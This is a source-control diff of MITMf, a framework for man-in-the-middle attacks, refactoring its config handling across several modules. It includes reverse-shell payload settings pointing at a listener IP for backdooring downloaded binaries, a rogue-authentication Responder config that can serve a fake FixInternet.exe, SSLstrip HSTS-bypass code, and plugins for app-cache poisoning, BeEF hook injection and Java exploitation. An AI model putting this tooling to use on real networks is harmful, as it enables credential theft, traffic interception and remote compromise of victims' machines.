SHELL = reverse_shell_tcp
|
||||||
|
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
|
||||||
|
ZERO_CERT = True
|
||||||
|
PATCH_DLL = False
|
||||||
|
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[[MachoIntelx86]]]]
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 4444
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[[MachoIntelx64]]]]
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 5555
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
@ -1,59 +0,0 @@
|
||||||
[Responder Core]
|
|
||||||
;;
|
|
||||||
;Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
|
||||||
SQL = On
|
|
||||||
SMB = On
|
|
||||||
Kerberos = On
|
|
||||||
FTP = On
|
|
||||||
POP = On
|
|
||||||
;;Listen on 25/TCP, 587/TCP
|
|
||||||
SMTP = On
|
|
||||||
IMAP = On
|
|
||||||
HTTP = On
|
|
||||||
HTTPS = On
|
|
||||||
DNS = On
|
|
||||||
LDAP = On
|
|
||||||
;
|
|
||||||
;Set a custom challenge
|
|
||||||
Challenge = 1122334455667788
|
|
||||||
;
|
|
||||||
;Set this to change the default logging file
|
|
||||||
SessionLog = Responder-Session.log
|
|
||||||
;
|
|
||||||
;Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
|
||||||
;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
|
||||||
RespondTo =
|
|
||||||
;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
|
|
||||||
;RespondTo = WPAD,DEV,PROD,SQLINT
|
|
||||||
RespondToName =
|
|
||||||
;
|
|
||||||
;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
|
||||||
DontRespondTo =
|
|
||||||
;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
|
|
||||||
DontRespondToName =
|
|
||||||
;
|
|
||||||
[HTTP Server]
|
|
||||||
;;
|
|
||||||
;Set this to On if you want to always serve a specific file to the victim.
|
|
||||||
Serve-Always = Off
|
|
||||||
;
|
|
||||||
;Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
|
|
||||||
Serve-Exe = Off
|
|
||||||
;
|
|
||||||
;Uncomment and specify a custom file to serve, the file must exist.
|
|
||||||
Filename = config/responder/Denied.html
|
|
||||||
;
|
|
||||||
;Specify a custom executable file to serve, the file must exist.
|
|
||||||
ExecFilename = config/responder/FixInternet.exe
|
|
||||||
;
|
|
||||||
;Set your custom PAC script
|
|
||||||
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
|
|
||||||
;
|
|
||||||
[HTTPS Server]
|
|
||||||
;
|
|
||||||
;Change to use your certs
|
|
||||||
cert = config/responder/certs/responder.crt
|
|
||||||
key = config/responder/certs/responder.key
|
|
||||||
;
|
|
||||||
|
|
||||||
|
|
|
@ -16,7 +16,7 @@
|
||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time
|
import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,BaseHTTPServer, select,urlparse,zlib, string, time
|
||||||
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
|
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
|
||||||
from Fingerprint import RunSmbFinger,OsNameClientVersion
|
from Fingerprint import RunSmbFinger,OsNameClientVersion
|
||||||
from odict import OrderedDict
|
from odict import OrderedDict
|
||||||
|
@ -24,45 +24,6 @@ from socket import inet_aton
|
||||||
from random import randrange
|
from random import randrange
|
||||||
from libs.sslstrip.DnsCache import DnsCache
|
from libs.sslstrip.DnsCache import DnsCache
|
||||||
|
|
||||||
VERSION = '2.1.2'
|
|
||||||
|
|
||||||
#Config parsing
|
|
||||||
config = ConfigParser.ConfigParser()
|
|
||||||
config.read("./config/responder/responder.conf")
|
|
||||||
|
|
||||||
# Set some vars.
|
|
||||||
On_Off = config.get('Responder Core', 'HTTP').upper()
|
|
||||||
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
|
|
||||||
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
|
|
||||||
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
|
|
||||||
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
|
|
||||||
POP_On_Off = config.get('Responder Core', 'POP').upper()
|
|
||||||
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
|
|
||||||
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
|
|
||||||
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
|
|
||||||
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
|
|
||||||
Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
|
|
||||||
NumChal = config.get('Responder Core', 'Challenge')
|
|
||||||
SessionLog = config.get('Responder Core', 'SessionLog')
|
|
||||||
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
|
|
||||||
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
|
|
||||||
FILENAME = config.get('HTTP Server', 'Filename')
|
|
||||||
WPAD_Script = config.get('HTTP Server', 'WPADScript')
|
|
||||||
#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
|
|
||||||
RespondTo = config.get('Responder Core', 'RespondTo').strip()
|
|
||||||
RespondTo.split(",")
|
|
||||||
RespondToName = config.get('Responder Core', 'RespondToName').strip()
|
|
||||||
RespondToName.split(",")
|
|
||||||
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
|
|
||||||
DontRespondTo.split(",")
|
|
||||||
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
|
|
||||||
DontRespondToName.split(",")
|
|
||||||
|
|
||||||
HTMLToServe = ''
|
|
||||||
|
|
||||||
if len(NumChal) is not 16:
|
|
||||||
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
|
|
||||||
|
|
||||||
def IsOsX():
|
def IsOsX():
|
||||||
Os_version = sys.platform
|
Os_version = sys.platform
|
||||||
if Os_version == "darwin":
|
if Os_version == "darwin":
|
||||||
|
@ -151,11 +112,6 @@ def PrintLLMNRNBTNS(outfile,Message):
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
|
|
||||||
Challenge = ""
|
|
||||||
for i in range(0,len(NumChal),2):
|
|
||||||
Challenge += NumChal[i:i+2].decode("hex")
|
|
||||||
|
|
||||||
#Packet class handling all packet generation (see odict.py).
|
#Packet class handling all packet generation (see odict.py).
|
||||||
class Packet():
|
class Packet():
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
||||||
|
@ -2021,8 +1977,8 @@ class SSlSock(ThreadingMixIn, TCPServer):
|
||||||
def __init__(self, server_address, RequestHandlerClass):
|
def __init__(self, server_address, RequestHandlerClass):
|
||||||
BaseServer.__init__(self, server_address, RequestHandlerClass)
|
BaseServer.__init__(self, server_address, RequestHandlerClass)
|
||||||
ctx = SSL.Context(SSL.SSLv3_METHOD)
|
ctx = SSL.Context(SSL.SSLv3_METHOD)
|
||||||
cert = config.get('HTTPS Server', 'cert')
|
cert = SSLcert
|
||||||
key = config.get('HTTPS Server', 'key')
|
key = SSLkey
|
||||||
ctx.use_privatekey_file(key)
|
ctx.use_privatekey_file(key)
|
||||||
ctx.use_certificate_file(cert)
|
ctx.use_certificate_file(cert)
|
||||||
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
|
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
|
||||||
|
@ -2483,7 +2439,51 @@ def serve_thread_SSL(host, port, handler):
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
|
print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
|
||||||
|
|
||||||
def start_responder(options, ip_address):
|
def start_responder(options, ip_address, config):
|
||||||
|
|
||||||
|
global VERSION; VERSION = '2.1.2'
|
||||||
|
|
||||||
|
# Set some vars.
|
||||||
|
global On_Off; On_Off = config['HTTP'].upper()
|
||||||
|
global SSL_On_Off; SSL_On_Off = config['HTTPS'].upper()
|
||||||
|
global SMB_On_Off; SMB_On_Off = config['SMB'].upper()
|
||||||
|
global SQL_On_Off; SQL_On_Off = config['SQL'].upper()
|
||||||
|
global FTP_On_Off; FTP_On_Off = config['FTP'].upper()
|
||||||
|
global POP_On_Off; POP_On_Off = config['POP'].upper()
|
||||||
|
global IMAP_On_Off; IMAP_On_Off = config['IMAP'].upper()
|
||||||
|
global SMTP_On_Off; SMTP_On_Off = config['SMTP'].upper()
|
||||||
|
global LDAP_On_Off; LDAP_On_Off = config['LDAP'].upper()
|
||||||
|
global DNS_On_Off; DNS_On_Off = config['DNS'].upper()
|
||||||
|
global Krb_On_Off; Krb_On_Off = config['Kerberos'].upper()
|
||||||
|
global NumChal; NumChal = config['Challenge']
|
||||||
|
global SessionLog; SessionLog = config['SessionLog']
|
||||||
|
global Exe_On_Off; Exe_On_Off = config['HTTP Server']['Serve-Exe'].upper()
|
||||||
|
global Exec_Mode_On_Off; Exec_Mode_On_Off = config['HTTP Server']['Serve-Always'].upper()
|
||||||
|
global FILENAME; FILENAME = config['HTTP Server']['Filename']
|
||||||
|
global WPAD_Script; WPAD_Script = config['HTTP Server']['WPADScript']
|
||||||
|
#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
|
||||||
|
|
||||||
|
global SSLcert; SSLcert = config['HTTPS Server']['cert']
|
||||||
|
global SSLkey; SSLkey = config['HTTPS Server']['key']
|
||||||
|
|
||||||
|
global RespondTo; RespondTo = config['RespondTo'].strip()
|
||||||
|
RespondTo.split(",")
|
||||||
|
global RespondToName; RespondToName = config['RespondToName'].strip()
|
||||||
|
RespondToName.split(",")
|
||||||
|
global DontRespondTo; DontRespondTo = config['DontRespondTo'].strip()
|
||||||
|
DontRespondTo.split(",")
|
||||||
|
global DontRespondToName; DontRespondToName = config['DontRespondToName'].strip()
|
||||||
|
DontRespondToName.split(",")
|
||||||
|
|
||||||
|
HTMLToServe = ''
|
||||||
|
|
||||||
|
if len(NumChal) is not 16:
|
||||||
|
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
|
||||||
|
|
||||||
|
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
|
||||||
|
global Challange; Challenge = ""
|
||||||
|
for i in range(0,len(NumChal),2):
|
||||||
|
Challenge += NumChal[i:i+2].decode("hex")
|
||||||
|
|
||||||
#Cli options.
|
#Cli options.
|
||||||
global OURIP; OURIP = ip_address
|
global OURIP; OURIP = ip_address
|
||||||
|
|
|
@ -18,7 +18,6 @@
|
||||||
|
|
||||||
import re, os
|
import re, os
|
||||||
import logging
|
import logging
|
||||||
from configobj import ConfigObj
|
|
||||||
|
|
||||||
class URLMonitor:
|
class URLMonitor:
|
||||||
|
|
||||||
|
@ -44,12 +43,7 @@ class URLMonitor:
|
||||||
self.redirects = []
|
self.redirects = []
|
||||||
self.faviconReplacement = False
|
self.faviconReplacement = False
|
||||||
self.hsts = False
|
self.hsts = False
|
||||||
|
self.hsts_config = None
|
||||||
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
|
|
||||||
|
|
||||||
for k,v in hsts_config.items():
|
|
||||||
self.sustitucion[k] = v
|
|
||||||
self.real[v] = k
|
|
||||||
|
|
||||||
def isSecureLink(self, client, url):
|
def isSecureLink(self, client, url):
|
||||||
for expression in URLMonitor.javascriptTrickery:
|
for expression in URLMonitor.javascriptTrickery:
|
||||||
|
@ -138,9 +132,19 @@ class URLMonitor:
|
||||||
self.strippedURLs.add((client, url))
|
self.strippedURLs.add((client, url))
|
||||||
self.strippedURLPorts[(client, url)] = int(port)
|
self.strippedURLPorts[(client, url)] = int(port)
|
||||||
|
|
||||||
def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,):
|
def setFaviconSpoofing(self, faviconSpoofing):
|
||||||
self.faviconSpoofing = faviconSpoofing
|
self.faviconSpoofing = faviconSpoofing
|
||||||
self.hsts = hstsbypass
|
|
||||||
|
def setHstsBypass(self, hstsconfig):
|
||||||
|
if hstsconfig:
|
||||||
|
self.hsts = True
|
||||||
|
self.hsts_config = hstsconfig
|
||||||
|
|
||||||
|
for k,v in self.hsts_config.items():
|
||||||
|
self.sustitucion[k] = v
|
||||||
|
self.real[v] = k
|
||||||
|
|
||||||
|
def setClientLogging(self, clientLogging):
|
||||||
self.clientLogging = clientLogging
|
self.clientLogging = clientLogging
|
||||||
|
|
||||||
def isFaviconSpoofing(self):
|
def isFaviconSpoofing(self):
|
||||||
|
|
35
mitmf.py
35
mitmf.py
|
@ -15,7 +15,7 @@ except:
|
||||||
sys.exit("[-] user_agents library not installed!")
|
sys.exit("[-] user_agents library not installed!")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
import configobj
|
from configobj import ConfigObj
|
||||||
except:
|
except:
|
||||||
sys.exit("[-] configobj library not installed!")
|
sys.exit("[-] configobj library not installed!")
|
||||||
|
|
||||||
|
@ -29,21 +29,23 @@ sergio_version = "0.2.1"
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
|
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
|
||||||
|
#add MITMf options
|
||||||
|
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
||||||
|
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
||||||
|
mgroup.add_argument("-i", "--interface", type=str, metavar="interface" ,help="Interface to listen on")
|
||||||
|
mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.cfg", metavar='configfile', help="Specify config file to use")
|
||||||
|
mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies')
|
||||||
#add sslstrip options
|
#add sslstrip options
|
||||||
sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library")
|
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
|
||||||
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
|
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
|
||||||
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
|
||||||
slogopts = sgroup.add_mutually_exclusive_group()
|
slogopts = sgroup.add_mutually_exclusive_group()
|
||||||
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
|
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
|
||||||
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
|
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
|
||||||
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
|
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
|
||||||
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
|
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
|
||||||
sgroup.add_argument("-i", "--interface", type=str, required=True, metavar="interface" ,help="Interface to listen on")
|
|
||||||
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
|
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
|
||||||
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
|
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
|
||||||
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
||||||
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
|
|
||||||
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass")
|
|
||||||
|
|
||||||
#Initialize plugins
|
#Initialize plugins
|
||||||
plugins = []
|
plugins = []
|
||||||
|
@ -69,6 +71,23 @@ if __name__ == "__main__":
|
||||||
|
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
try:
|
||||||
|
configfile = ConfigObj(args.configfile)
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config file: " + str(e))
|
||||||
|
|
||||||
|
config_args = configfile['MITMf']['args']
|
||||||
|
if config_args:
|
||||||
|
print "[*] Loading arguments from config file"
|
||||||
|
for arg in config_args.split(' '):
|
||||||
|
sys.argv.append(arg)
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
if not args.interface:
|
||||||
|
sys.exit("[-] -i , --interface argument is required")
|
||||||
|
|
||||||
|
args.configfile = configfile #so we can pass the configobj down to all the plugins
|
||||||
|
|
||||||
log_level = logging.__dict__[args.log_level.upper()]
|
log_level = logging.__dict__[args.log_level.upper()]
|
||||||
|
|
||||||
#Start logging
|
#Start logging
|
||||||
|
@ -84,7 +103,7 @@ if __name__ == "__main__":
|
||||||
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
|
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
|
||||||
if ('--responder' and '--wpad') in sys.argv:
|
if ('--responder' and '--wpad') in sys.argv:
|
||||||
args.listen = 3141
|
args.listen = 3141
|
||||||
print "[*] Listening on port 3141 since --wpad was passed"
|
print "[*] SSLstrip is now listening on port 3141 since --wpad was passed"
|
||||||
|
|
||||||
load = []
|
load = []
|
||||||
try:
|
try:
|
||||||
|
@ -103,7 +122,7 @@ if __name__ == "__main__":
|
||||||
from libs.sslstrip.StrippingProxy import StrippingProxy
|
from libs.sslstrip.StrippingProxy import StrippingProxy
|
||||||
from libs.sslstrip.URLMonitor import URLMonitor
|
from libs.sslstrip.URLMonitor import URLMonitor
|
||||||
|
|
||||||
URLMonitor.getInstance().setValues(args.favicon, args.hsts)
|
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
|
||||||
CookieCleaner.getInstance().setEnabled(args.killsessions)
|
CookieCleaner.getInstance().setEnabled(args.killsessions)
|
||||||
ProxyPlugins.getInstance().setPlugins(load)
|
ProxyPlugins.getInstance().setPlugins(load)
|
||||||
|
|
||||||
|
|
|
@ -1,15 +1,14 @@
|
||||||
#
|
|
||||||
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
||||||
#######################################################################################################
|
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from datetime import date
|
from datetime import date
|
||||||
from libs.sslstrip.URLMonitor import URLMonitor
|
from libs.sslstrip.URLMonitor import URLMonitor
|
||||||
import logging
|
import logging
|
||||||
import ConfigParser
|
|
||||||
import re
|
import re
|
||||||
import os.path
|
import os.path
|
||||||
import time
|
import time
|
||||||
|
import sys
|
||||||
|
|
||||||
class AppCachePlugin(Plugin):
|
class AppCachePlugin(Plugin):
|
||||||
name = "App Cache Poison"
|
name = "App Cache Poison"
|
||||||
|
@ -21,24 +20,15 @@ class AppCachePlugin(Plugin):
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
self.options = options
|
self.options = options
|
||||||
self.config_file = "./config/app_cache_poison.cfg"
|
|
||||||
self.config = None
|
|
||||||
self.mass_poisoned_browsers = []
|
self.mass_poisoned_browsers = []
|
||||||
self.urlMonitor = URLMonitor.getInstance()
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
|
|
||||||
|
try:
|
||||||
|
self.config = options.configfile['AppCachePoison']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
|
||||||
|
|
||||||
print "[*] App Cache Poison plugin online"
|
print "[*] App Cache Poison plugin online"
|
||||||
self.createTamperer(self.config_file)
|
|
||||||
|
|
||||||
def parseConfig(self, configFile):
|
|
||||||
config = ConfigParser.ConfigParser()
|
|
||||||
config.read(configFile)
|
|
||||||
readConfig = config._sections
|
|
||||||
readConfig.update(config.defaults())
|
|
||||||
return readConfig
|
|
||||||
|
|
||||||
def createTamperer(self, configFile):
|
|
||||||
logging.debug("Reading tamper config file: %s" % (configFile))
|
|
||||||
self.config = self.parseConfig(configFile)
|
|
||||||
|
|
||||||
def handleResponse(self, request, data):
|
def handleResponse(self, request, data):
|
||||||
|
|
||||||
|
@ -55,12 +45,12 @@ class AppCachePlugin(Plugin):
|
||||||
|
|
||||||
urls = self.urlMonitor.getRedirectionSet(url)
|
urls = self.urlMonitor.getRedirectionSet(url)
|
||||||
|
|
||||||
(s,element,url) = self.getSectionForUrls(urls)
|
(name,s,element,url) = self.getSectionForUrls(urls)
|
||||||
if not s:
|
if s is False:
|
||||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
||||||
return {'request': request, 'data': data}
|
return {'request': request, 'data': data}
|
||||||
|
|
||||||
logging.debug("Found URL %s in section %s" % (url, s['__name__']))
|
logging.debug("Found URL %s in section %s" % (url, name))
|
||||||
p = self.getTemplatePrefix(s)
|
p = self.getTemplatePrefix(s)
|
||||||
if element == 'tamper':
|
if element == 'tamper':
|
||||||
logging.debug("Poisoning tamper URL with template %s" % (p))
|
logging.debug("Poisoning tamper URL with template %s" % (p))
|
||||||
|
@ -160,12 +150,12 @@ class AppCachePlugin(Plugin):
|
||||||
|
|
||||||
def getTemplatePrefix(self, section):
|
def getTemplatePrefix(self, section):
|
||||||
if section.has_key('templates'):
|
if section.has_key('templates'):
|
||||||
return self.config['templates_path'] + '/' + section['templates']
|
return self.config['templates_path'] + '/' + section['templates']
|
||||||
|
|
||||||
return self.getDefaultTemplatePrefix()
|
return self.getDefaultTemplatePrefix()
|
||||||
|
|
||||||
def getDefaultTemplatePrefix(self):
|
def getDefaultTemplatePrefix(self):
|
||||||
return self.config['templates_path'] + '/default'
|
return self.config['templates_path'] + '/default'
|
||||||
|
|
||||||
def getManifestUrl(self, section):
|
def getManifestUrl(self, section):
|
||||||
return section.get("manifest_url",'/robots.txt')
|
return section.get("manifest_url",'/robots.txt')
|
||||||
|
@ -175,15 +165,16 @@ class AppCachePlugin(Plugin):
|
||||||
for i in self.config:
|
for i in self.config:
|
||||||
if isinstance(self.config[i], dict): #section
|
if isinstance(self.config[i], dict): #section
|
||||||
section = self.config[i]
|
section = self.config[i]
|
||||||
|
name = i
|
||||||
if section.get('tamper_url',False) == url:
|
if section.get('tamper_url',False) == url:
|
||||||
return (section, 'tamper',url)
|
return (name, section, 'tamper',url)
|
||||||
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
||||||
return (section, 'tamper',url)
|
return (name, section, 'tamper',url)
|
||||||
if section.get('manifest_url',False) == url:
|
if section.get('manifest_url',False) == url:
|
||||||
return (section, 'manifest',url)
|
return (name, section, 'manifest',url)
|
||||||
if section.get('raw_url',False) == url:
|
if section.get('raw_url',False) == url:
|
||||||
return (section, 'raw',url)
|
return (name, section, 'raw',url)
|
||||||
|
|
||||||
return (False,'',urls.copy().pop())
|
return (None, False,'',urls.copy().pop())
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -9,11 +9,6 @@ import json
|
||||||
import threading
|
import threading
|
||||||
import libs.beefapi as beefapi
|
import libs.beefapi as beefapi
|
||||||
|
|
||||||
try:
|
|
||||||
from configobj import ConfigObj
|
|
||||||
except:
|
|
||||||
sys.exit('[-] configobj library not installed!')
|
|
||||||
|
|
||||||
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
||||||
requests_log.setLevel(logging.WARNING)
|
requests_log.setLevel(logging.WARNING)
|
||||||
|
|
||||||
|
@ -25,10 +20,17 @@ class BeefAutorun(Inject, Plugin):
|
||||||
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
||||||
|
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
self.options = options
|
self.options = options
|
||||||
|
|
||||||
beefconfig = ConfigObj("./config/mitmf.cfg")['BeEF']
|
try:
|
||||||
userconfig = ConfigObj("./config/beefautorun.cfg")
|
beefconfig = options.configfile['MITMf']['BeEF']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
|
||||||
|
|
||||||
|
try:
|
||||||
|
userconfig = options.configfile['BeEFAutorun']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
|
||||||
|
|
||||||
self.Mode = userconfig['mode']
|
self.Mode = userconfig['mode']
|
||||||
self.All_modules = userconfig["ALL"]
|
self.All_modules = userconfig["ALL"]
|
||||||
|
|
|
@ -2,7 +2,7 @@ from plugins.plugin import Plugin
|
||||||
|
|
||||||
|
|
||||||
class CacheKill(Plugin):
|
class CacheKill(Plugin):
|
||||||
name = "CacheKill Plugin"
|
name = "CacheKill"
|
||||||
optname = "cachekill"
|
optname = "cachekill"
|
||||||
desc = "Kills page caching by modifying headers"
|
desc = "Kills page caching by modifying headers"
|
||||||
implements = ["handleHeader", "connectionMade"]
|
implements = ["handleHeader", "connectionMade"]
|
||||||
|
|
|
@ -88,7 +88,7 @@ class FilePwn(Plugin):
|
||||||
#NOT USED NOW
|
#NOT USED NOW
|
||||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||||
|
|
||||||
self.userConfig = ConfigObj("./config/filepwn.cfg")
|
self.userConfig = options.configfile['FilePwn']
|
||||||
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
||||||
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
||||||
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
||||||
|
|
|
@ -3,6 +3,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Er
|
||||||
from scapy.all import get_if_addr
|
from scapy.all import get_if_addr
|
||||||
import time
|
import time
|
||||||
import re
|
import re
|
||||||
|
import sys
|
||||||
import argparse
|
import argparse
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from plugins.CacheKill import CacheKill
|
from plugins.CacheKill import CacheKill
|
||||||
|
|
|
@ -9,7 +9,6 @@ import sys
|
||||||
import logging
|
import logging
|
||||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||||
from scapy.all import get_if_addr
|
from scapy.all import get_if_addr
|
||||||
from configobj import ConfigObj
|
|
||||||
|
|
||||||
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
||||||
requests_log.setLevel(logging.WARNING)
|
requests_log.setLevel(logging.WARNING)
|
||||||
|
@ -26,8 +25,15 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
self.options = options
|
self.options = options
|
||||||
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
|
